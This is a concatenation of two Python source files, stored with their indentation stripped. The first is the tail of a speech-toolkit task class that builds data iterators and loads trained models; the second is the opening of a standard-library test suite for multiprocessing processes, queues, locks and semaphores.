max_cache_size=max_cache_size,
distributed=distributed,
name=name,
batch_size=batch_size,
train_dtype=train_dtype,
num_workers=num_workers,
seed=seed,
allow_variable_data_keys=allow_variable_data_keys,
ngpu=ngpu,
)
if multiple_iterator:
return cls.build_multiple_iter_factory(
**kwargs,
multiple_iterator=False,
iterator_type=iterator_type,
batch_type=batch_type,
batch_bins=batch_bins,
fold_length=fold_length,
sort_in_batch=sort_in_batch,
sort_batch=sort_batch,
chunk_length=chunk_length,
chunk_shift_ratio=chunk_shift_ratio,
num_cache_chunks=num_cache_chunks,
)
elif iterator_type == "sequence":
return cls.build_sequence_iter_factory(
**kwargs,
batch_type=batch_type,
batch_bins=batch_bins,
fold_length=fold_length,
sort_in_batch=sort_in_batch,
sort_batch=sort_batch,
)
elif iterator_type == "chunk":
return cls.build_chunk_iter_factory(
**kwargs,
chunk_length=chunk_length,
chunk_shift_ratio=chunk_shift_ratio,
num_cache_chunks=num_cache_chunks,
)
else:
raise RuntimeError(f"Not supported: iterator_type={iterator_type}")
@classmethod
def build_sequence_iter_factory(
cls,
data_path_and_name_and_type,
shape_files: Union[Tuple[str, ...], List[str]],
batch_type: str,
train: bool,
preprocess_fn,
batch_size: int,
batch_bins: int,
collate_fn,
train_dtype: str,
fold_length: Sequence[int],
num_workers: int,
sort_in_batch: str,
sort_batch: str,
seed: int,
allow_variable_data_keys: bool,
ngpu: int,
num_batches: Optional[int],
num_iters_per_epoch: Optional[int],
max_cache_size: float,
distributed: bool,
name: str,
) -> AbsIterFactory:
assert check_argument_types()
if train_dtype in ("float32", "O0", "O1", "O2", "O3"):
train_dtype = "float32"
dataset = ESPnetDataset(
data_path_and_name_and_type,
float_dtype=train_dtype,
preprocess=preprocess_fn,
max_cache_size=max_cache_size,
)
cls.check_task_requirements(dataset, allow_variable_data_keys)
batch_sampler = build_batch_sampler(
type=batch_type,
shape_files=shape_files,
fold_lengths=fold_length,
batch_size=batch_size,
batch_bins=batch_bins,
sort_in_batch=sort_in_batch,
sort_batch=sort_batch,
drop_last=False,
min_batch_size=torch.distributed.get_world_size() if distributed else 1,
)
batches = list(batch_sampler)
if num_batches is not None:
batches = batches[:num_batches]
bs_list = [len(batch) for batch in batches]
logging.info(f"[{name}] dataset:\n{dataset}")
logging.info(f"[{name}] Batch sampler: {batch_sampler}")
logging.info(
f"[{name}] mini-batch sizes summary: N-batch={len(bs_list)}, "
f"mean={np.mean(bs_list):.1f}, min={np.min(bs_list)}, max={np.max(bs_list)}"
)
if distributed:
world_size = torch.distributed.get_world_size()
rank = torch.distributed.get_rank()
for batch in batches:
if len(batch) < world_size:
raise RuntimeError(
f"The batch-size must be equal or more than world_size: "
f"{len(batch)} < {world_size}"
)
batches = [batch[rank::world_size] for batch in batches]
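# e.g. with world_size=4, a batch of keys [k0, ..., k7] becomes [k0, k4] on rank 0,
# [k1, k5] on rank 1, [k2, k6] on rank 2, and [k3, k7] on rank 3, so every rank
# iterates over the same number of mini-batches per epoch.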
return SequenceIterFactory(
dataset=dataset,
batches=batches,
seed=seed,
num_iters_per_epoch=num_iters_per_epoch,
shuffle=train,
num_workers=num_workers,
collate_fn=collate_fn,
pin_memory=ngpu > 0,
)
@classmethod
def build_chunk_iter_factory(
cls,
data_path_and_name_and_type,
shape_files: Union[Tuple[str, ...], List[str]],
train: bool,
preprocess_fn,
collate_fn,
train_dtype: str,
num_workers: int,
seed: int,
allow_variable_data_keys: bool,
batch_size: int,
ngpu: int,
chunk_length: Union[int, str],
chunk_shift_ratio: float,
num_cache_chunks: int,
num_batches: Optional[int],
num_iters_per_epoch: Optional[int],
max_cache_size: float,
distributed: bool,
name: str,
) -> AbsIterFactory:
assert check_argument_types()
if train_dtype in ("float32", "O0", "O1", "O2", "O3"):
train_dtype = "float32"
dataset = ESPnetDataset(
data_path_and_name_and_type,
float_dtype=train_dtype,
preprocess=preprocess_fn,
max_cache_size=max_cache_size,
)
cls.check_task_requirements(dataset, allow_variable_data_keys)
if len(shape_files) == 0:
key_file = data_path_and_name_and_type[0][0]
else:
key_file = shape_files[0]
batch_sampler = UnsortedBatchSampler(batch_size=1, key_file=key_file)
batches = list(batch_sampler)
if num_batches is not None:
batches = batches[:num_batches]
logging.info(f"[{name}] dataset:\n{dataset}")
if distributed:
world_size = torch.distributed.get_world_size()
rank = torch.distributed.get_rank()
if len(batches) < world_size:
raise RuntimeError("Number of samples is smaller than world_size")
if batch_size < world_size:
raise RuntimeError("batch_size must be equal or more than world_size")
if rank < batch_size % world_size:
batch_size = batch_size // world_size + 1
else:
batch_size = batch_size // world_size
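# e.g. batch_size=10 with world_size=4 gives per-rank batch sizes [3, 3, 2, 2],
# which still sum to the global batch size of 10.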
num_cache_chunks = num_cache_chunks // world_size
# NOTE(kamo): The whole corpus is split by sample counts without considering
# the individual lengths, so the number of iterations is not necessarily
# equal across ranks; training is limited by the rank with the fewest
# iterations, i.e. the samples beyond that count are discarded.
batches = batches[rank::world_size]
return ChunkIterFactory(
dataset=dataset,
batches=batches,
seed=seed,
# For chunk iterator,
# --num_iters_per_epoch doesn't indicate the number of iterations,
# but indicates the number of samples.
num_samples_per_epoch=num_iters_per_epoch,
shuffle=train,
num_workers=num_workers,
collate_fn=collate_fn,
pin_memory=ngpu > 0,
batch_size=batch_size,
chunk_length=chunk_length,
chunk_shift_ratio=chunk_shift_ratio,
num_cache_chunks=num_cache_chunks,
)
@classmethod
def build_multiple_iter_factory(
cls,
data_path_and_name_and_type,
shape_files: Union[Tuple[str, ...], List[str]],
train: bool,
num_iters_per_epoch: Optional[int],
max_cache_size: float,
seed: int,
**kwargs,
):
assert check_argument_types()
assert len(data_path_and_name_and_type) > 0, len(data_path_and_name_and_type)
# 1. Sanity check
num_splits = None
for path in [path for path, _, _ in data_path_and_name_and_type] + list(
shape_files
):
if not Path(path).is_dir():
raise RuntimeError(f"{path} is not a directory")
p = Path(path) / "num_splits"
if not p.exists():
raise FileNotFoundError(f"{p} is not found")
with p.open() as f:
_num_splits = int(f.read())
if num_splits is not None and num_splits != _num_splits:
raise RuntimeError(
f"Number of splits are mismathed: "
f"{data_path_and_name_and_type[0][0]} and {path}"
)
num_splits = _num_splits
for i in range(num_splits):
p = Path(path) / f"split.{i}"
if not p.exists():
raise FileNotFoundError(f"{p} is not found")
# 2. Create functions to build an iter factory for each split
data_path_and_name_and_type_list = [
[
(str(Path(p) / f"split.{i}"), n, t)
for p, n, t in data_path_and_name_and_type
]
for i in range(num_splits)
]
shape_files_list = [
[str(Path(s) / f"split.{i}") for s in shape_files]
for i in range(num_splits)
]
num_iters_per_epoch_list = [
(num_iters_per_epoch + i) // num_splits
if num_iters_per_epoch is not None
else None
for i in range(num_splits)
]
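# e.g. num_iters_per_epoch=10 with num_splits=3 gives
# [(10 + 0) // 3, (10 + 1) // 3, (10 + 2) // 3] == [3, 3, 4], which sums to 10.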
max_cache_size = max_cache_size / num_splits
# Note that iter-factories are built for each epoch at runtime lazily.
build_funcs = [
functools.partial(
cls.build_iter_factory,
data_path_and_name_and_type=_data_path_and_name_and_type,
shape_files=_shape_files,
num_iters_per_epoch=_num_iters_per_epoch,
max_cache_size=max_cache_size,
seed=seed,
train=train,
**kwargs,
)
for (
_data_path_and_name_and_type,
_shape_files,
_num_iters_per_epoch,
) in zip(
data_path_and_name_and_type_list,
shape_files_list,
num_iters_per_epoch_list,
)
]
# 3. Build MultipleIterFactory
return MultipleIterFactory(build_funcs=build_funcs, shuffle=train, seed=seed,)
@classmethod
def build_streaming_iterator(
cls,
data_path_and_name_and_type,
preprocess_fn,
collate_fn,
key_file: str = None,
batch_size: int = 1,
dtype: str = np.float32,
num_workers: int = 1,
allow_variable_data_keys: bool = False,
ngpu: int = 0,
inference: bool = False,
) -> DataLoader:
"""Build DataLoader using iterable dataset"""
assert check_argument_types()
if dtype in ("float32", "O0", "O1", "O2", "O3"):
dtype = "float32"
# For backward compatibility for pytorch DataLoader
if collate_fn is not None:
kwargs = dict(collate_fn=collate_fn)
else:
kwargs = {}
# IterableDataset is supported from pytorch>=1.2
if LooseVersion(torch.__version__) >= LooseVersion("1.2"):
dataset = IterableESPnetDataset(
data_path_and_name_and_type,
float_dtype=dtype,
preprocess=preprocess_fn,
key_file=key_file,
)
kwargs.update(batch_size=batch_size)
else:
dataset = ESPnetDataset(
data_path_and_name_and_type,
float_dtype=dtype,
preprocess=preprocess_fn,
)
if key_file is None:
key_file = data_path_and_name_and_type[0][0]
batch_sampler = UnsortedBatchSampler(
batch_size=batch_size, key_file=key_file, drop_last=False,
)
kwargs.update(batch_sampler=batch_sampler)
cls.check_task_requirements(dataset, allow_variable_data_keys, inference)
return DataLoader(
dataset=dataset, pin_memory=ngpu > 0, num_workers=num_workers, **kwargs,
)
# ~~~~~~~~~ The methods below are mainly used for inference ~~~~~~~~~
@classmethod
def build_model_from_file(
cls,
config_file: Union[Path, str],
model_file: Union[Path, str] = None,
device: str = "cpu",
) -> Tuple[AbsESPnetModel, argparse.Namespace]:
"""This method is used for inference or fine-tuning.
Args:
config_file: The config (yaml) file saved during training.
model_file: The model file saved during training.
device: Device specifier, e.g. "cpu" or "cuda".
"""
assert check_argument_types()
config_file = Path(config_file)
with config_file.open("r", encoding="utf-8") as f:
args = yaml.safe_load(f)
args = argparse.Namespace(**args)
model = cls.build_model(args)
if not isinstance(model, AbsESPnetModel):
raise RuntimeError(
f"model must inherit {AbsESPnetModel.__name__}, but got {type(model)}"
)
model.to(device)
if model_file is not None:
if device == "cuda":
# NOTE(kamo): "cuda" for torch.load always indicates cuda:0
# in PyTorch<=1.4
device = f"cuda:{torch.cuda.current_device()}"
model.load_state_dict(torch.load(model_file, map_location=device))
return model, args
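# A minimal usage sketch for inference; the task class and file paths below are
# hypothetical and depend on how the experiment directory was laid out:
#
# model, train_args = SomeTask.build_model_from_file(
# config_file="exp/train/config.yaml",
# model_file="exp/train/valid.loss.best.pth",
# device="cpu",
# )
# model.eval()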
|
_test_multiprocessing.py
|
#
# Unit tests for the multiprocessing package
#
import unittest
import queue as pyqueue
import time
import io
import itertools
import sys
import os
import gc
import errno
import signal
import array
import socket
import random
import logging
import struct
import operator
import weakref
import test.support
import test.support.script_helper
# Skip tests if _multiprocessing wasn't built.
_multiprocessing = test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test.support.import_module('multiprocessing.synchronize')
# import threading after _multiprocessing to raise a more relevant error
# message: "No module named _multiprocessing". _multiprocessing is not compiled
# without thread support.
import threading
import multiprocessing.dummy
import multiprocessing.connection
import multiprocessing.managers
import multiprocessing.heap
import multiprocessing.pool
from multiprocessing import util
try:
from multiprocessing import reduction
HAS_REDUCTION = reduction.HAVE_SEND_HANDLE
except ImportError:
HAS_REDUCTION = False
try:
from multiprocessing.sharedctypes import Value, copy
HAS_SHAREDCTYPES = True
except ImportError:
HAS_SHAREDCTYPES = False
try:
import msvcrt
except ImportError:
msvcrt = None
#
#
#
def latin(s):
return s.encode('latin')
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.DEBUG
DELTA = 0.1
CHECK_TIMINGS = False # setting this to True makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
from multiprocessing.connection import wait
def wait_for_handle(handle, timeout):
if timeout is not None and timeout < 0.0:
timeout = None
return wait([handle], timeout)
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except:
MAXFD = 256
# To speed up tests when using the forkserver, we can preload these:
PRELOAD = ['__main__', 'test.test_multiprocessing_forkserver']
#
# Some tests require ctypes
#
try:
from ctypes import Structure, c_int, c_double
except ImportError:
Structure = object
c_int = c_double = None
def check_enough_semaphores():
"""Check that the system supports enough semaphores to run the test."""
# minimum number of semaphores available according to POSIX
nsems_min = 256
try:
nsems = os.sysconf("SC_SEM_NSEMS_MAX")
except (AttributeError, ValueError):
# sysconf not available or setting not available
return
if nsems == -1 or nsems >= nsems_min:
return
raise unittest.SkipTest("The OS doesn't support enough semaphores "
"to run the test (required: %d)." % nsems_min)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.time()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.time() - t
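# Typical use in the tests below: wrap a blocking call, invoke it, then inspect
# .elapsed to see roughly how long it blocked, e.g.
# join = TimingWrapper(p.join)
# join(TIMEOUT1) # returns after ~TIMEOUT1 seconds if p is still alive
# join.elapsed # ~TIMEOUT1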
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
# For the sanity of Windows users, rather than crashing or freezing in
# multiple ways.
def __reduce__(self, *args):
raise NotImplementedError("shouldn't try to pickle a test case")
__reduce_ex__ = __reduce__
#
# Return the value of a semaphore
#
def get_value(self):
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
#
# Testcases
#
class DummyCallable:
def __call__(self, q, c):
assert isinstance(c, DummyCallable)
q.put(5)
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertIsInstance(authkey, bytes)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
def test_daemon_argument(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# By default uses the current process's daemon flag.
proc0 = self.Process(target=self._test)
self.assertEqual(proc0.daemon, self.current_process().daemon)
proc1 = self.Process(target=self._test, daemon=True)
self.assertTrue(proc1.daemon)
proc2 = self.Process(target=self._test, daemon=False)
self.assertFalse(proc2.daemon)
@classmethod
def _test(cls, q, *args, **kwds):
current = cls.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if cls.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEqual(p.authkey, current.authkey)
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.daemon, True)
self.assertNotIn(p, self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEqual(p.exitcode, None)
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(q.get(), args[1:])
self.assertEqual(q.get(), kwargs)
self.assertEqual(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEqual(q.get(), current.authkey)
self.assertEqual(q.get(), p.pid)
p.join()
self.assertEqual(p.exitcode, 0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
@classmethod
def _test_terminate(cls):
time.sleep(100)
@classmethod
def _test_sleep(cls, delay):
time.sleep(delay)
def test_terminate(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
p = self.Process(target=self._test_terminate)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(p.exitcode, None)
join = TimingWrapper(p.join)
self.assertEqual(join(0), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
self.assertEqual(join(-1), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
# XXX maybe terminating too soon causes the problems on Gentoo...
time.sleep(1)
p.terminate()
if hasattr(signal, 'alarm'):
# On the Gentoo buildbot waitpid() often seems to block forever.
# We use alarm() to interrupt it if it blocks for too long.
def handler(*args):
raise RuntimeError('join took too long: %s' % p)
old_handler = signal.signal(signal.SIGALRM, handler)
try:
signal.alarm(10)
self.assertEqual(join(), None)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_handler)
else:
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
p.join()
# sometimes get p.exitcode == 0 on Windows ...
if os.name != 'nt':
self.assertEqual(p.exitcode, -signal.SIGTERM)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertNotIn(p, self.active_children())
p.daemon = True
p.start()
self.assertIn(p, self.active_children())
p.join()
self.assertNotIn(p, self.active_children())
@classmethod
def _test_recursion(cls, wconn, id):
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = cls.Process(
target=cls._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
@classmethod
def _test_sentinel(cls, event):
event.wait(10.0)
def test_sentinel(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
event = self.Event()
p = self.Process(target=self._test_sentinel, args=(event,))
with self.assertRaises(ValueError):
p.sentinel
p.start()
self.addCleanup(p.join)
sentinel = p.sentinel
self.assertIsInstance(sentinel, int)
self.assertFalse(wait_for_handle(sentinel, timeout=0.0))
event.set()
p.join()
self.assertTrue(wait_for_handle(sentinel, timeout=1))
@classmethod
def _test_close(cls, rc=0, q=None):
if q is not None:
q.get()
sys.exit(rc)
def test_close(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
q = self.Queue()
p = self.Process(target=self._test_close, kwargs={'q': q})
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
# Child is still alive, cannot close
with self.assertRaises(ValueError):
p.close()
q.put(None)
p.join()
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.exitcode, 0)
p.close()
with self.assertRaises(ValueError):
p.is_alive()
with self.assertRaises(ValueError):
p.join()
with self.assertRaises(ValueError):
p.terminate()
p.close()
wr = weakref.ref(p)
del p
gc.collect()
self.assertIs(wr(), None)
def test_many_processes(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
N = 5 if sm == 'spawn' else 100
# Try to overwhelm the forkserver loop with events
procs = [self.Process(target=self._test_sleep, args=(0.01,))
for i in range(N)]
for p in procs:
p.start()
for p in procs:
p.join(timeout=10)
for p in procs:
self.assertEqual(p.exitcode, 0)
procs = [self.Process(target=self._test_terminate)
for i in range(N)]
for p in procs:
p.start()
time.sleep(0.001) # let the children start...
for p in procs:
p.terminate()
for p in procs:
p.join(timeout=10)
if os.name != 'nt':
for p in procs:
self.assertEqual(p.exitcode, -signal.SIGTERM)
def test_lose_target_ref(self):
c = DummyCallable()
wr = weakref.ref(c)
q = self.Queue()
p = self.Process(target=c, args=(q, c))
del c
p.start()
p.join()
self.assertIs(wr(), None)
self.assertEqual(q.get(), 5)
#
#
#
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.daemon = True
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
def test_stderr_flush(self):
# sys.stderr is flushed at process shutdown (issue #13812)
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
proc = self.Process(target=self._test_stderr_flush, args=(testfn,))
proc.start()
proc.join()
with open(testfn, 'r') as f:
err = f.read()
# The whole traceback was printed
self.assertIn("ZeroDivisionError", err)
self.assertIn("test_multiprocessing.py", err)
self.assertIn("1/0 # MARKER", err)
@classmethod
def _test_stderr_flush(cls, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
1/0 # MARKER
@classmethod
def _test_sys_exit(cls, reason, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
sys.exit(reason)
def test_sys_exit(self):
# See Issue 13854
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
for reason in (
[1, 2, 3],
'ignore this',
):
p = self.Process(target=self._test_sys_exit, args=(reason, testfn))
p.daemon = True
p.start()
p.join(5)
self.assertEqual(p.exitcode, 1)
with open(testfn, 'r') as f:
content = f.read()
self.assertEqual(content.rstrip(), str(reason))
os.unlink(testfn)
for reason in (True, False, 8):
p = self.Process(target=sys.exit, args=(reason,))
p.daemon = True
p.start()
p.join(5)
self.assertEqual(p.exitcode, reason)
#
#
#
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
@classmethod
def _test_put(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
# the values may be in buffer but not yet in pipe so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(pyqueue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
@classmethod
def _test_get(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
#queue.put(1)
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# Hangs unexpectedly, remove for now
#self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(pyqueue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
@classmethod
def _test_fork(cls, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
# process cannot shut down until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.daemon = True
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(pyqueue.Empty, queue.get, False)
p.join()
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
self.skipTest('qsize method not implemented')
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
@classmethod
def _test_task_done(cls, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in range(4)]
for p in workers:
p.daemon = True
p.start()
for i in range(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
def test_no_import_lock_contention(self):
with test.support.temp_cwd():
module_name = 'imported_by_an_imported_module'
with open(module_name + '.py', 'w') as f:
f.write("""if 1:
import multiprocessing
q = multiprocessing.Queue()
q.put('knock knock')
q.get(timeout=3)
q.close()
del q
""")
with test.support.DirsOnSysPath(os.getcwd()):
try:
__import__(module_name)
except pyqueue.Empty:
self.fail("Probable regression on import lock contention;"
" see Issue #22853")
def test_timeout(self):
q = multiprocessing.Queue()
start = time.time()
self.assertRaises(pyqueue.Empty, q.get, True, 0.200)
delta = time.time() - start
# Tolerate a delta of 30 ms because of the bad clock resolution on
# Windows (usually 15.6 ms)
self.assertGreaterEqual(delta, 0.170)
def test_queue_feeder_donot_stop_onexc(self):
# bpo-30414: verify feeder handles exceptions correctly
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
def __reduce__(self):
raise AttributeError
with test.support.captured_stderr():
q = self.Queue()
q.put(NotSerializable())
q.put(True)
# bpo-30595: use a timeout of 1 second for slow buildbots
self.assertTrue(q.get(timeout=1.0))
#
#
#
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
def test_lock_context(self):
with self.Lock():
pass
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
